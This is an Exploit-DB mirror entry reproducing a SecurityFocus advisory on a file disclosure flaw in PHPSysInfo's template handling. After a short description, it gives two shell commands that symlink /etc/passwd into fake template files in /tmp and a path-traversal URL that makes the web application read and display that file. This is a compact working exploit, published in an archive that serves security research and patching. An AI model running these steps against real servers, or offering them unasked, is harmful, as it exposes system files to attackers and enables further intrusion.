exploit-db-mirror/exploits/php/webapps/22457.txt
Offensive Security d304cc3d3e DB: 2017-11-24
116602 new exploits

Too many to list!
2017-11-24 20:56:23 +00:00

12 lines
No EOL
626 B
Text

source: http://www.securityfocus.com/bid/7275/info
PHPSysInfo has been reported to be vulnerable to a file disclosure issue.
Local users may be capable of influencing the include path for several PHPSysinfo template files. If the malicious template file is symlinked to a web server readable file, the contents of the linked file may be disclosed to the attacker.
This attack may lead to confidential or sensitive information disclosure, which could be used to launch other attacks.
~$ ln -s /etc/passwd /tmp/form.tpl
~$ ln -s /etc/passwd /tmp/box.tpl
http://www.example.com/index.php?template=../../../../tmp